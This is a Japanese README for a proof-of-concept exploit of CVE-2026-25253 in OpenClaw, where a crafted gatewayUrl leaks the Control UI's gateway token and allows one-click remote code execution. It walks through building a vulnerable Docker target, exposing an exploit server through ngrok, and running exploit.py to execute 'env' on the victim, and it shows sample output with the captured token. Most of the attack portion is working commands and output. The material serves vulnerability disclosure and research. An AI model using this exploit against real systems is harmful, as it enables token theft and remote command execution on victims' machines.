
OpenClawのCVE-2026-25253に対する概念実証エクスプロイト:細工されたgatewayUrlがControl UIのゲートウェイトークンを窃取し、不正なゲートウェイアクセスとワンクリックでのリモートコード実行を可能にする。
★ CVE-2026-25253 OpenClaw ワンクリックリモートコード実行 PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : OpenClaw 認証トークン窃取の脆弱性
説明: OpenClaw(別名 clawdbot または Moltbot)は v2026.1.29 より前のバージョンにおいて、細工された gatewayUrl クエリ文字列値を Control UI に渡すことで、保存されたゲートウェイ認証トークンを窃取される脆弱性があります。Control UI は検証やユーザーの確認なしに自動的に WebSocket 接続を確立します。これにより、不正なゲートウェイアクセスおよびワンクリックでのリモートコード実行につながる可能性があります。
Dockerfile — OpenClaw の脆弱な環境をビルドするtemplates/ — エクスプロイトで使用される悪意のある Web ページconfig.txt — 被害者環境で使用される OpenClaw 設定exploit.py — エクスプロイトサーバーrequirements.txt — PoC の依存関係docker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 を入力config.txt の内容を貼り付けるpip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
例:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
当社は CVE およびマルウェア分析を毎月公開しています。ご興味があれば、以下のリンクから当社の出版物をご覧ください。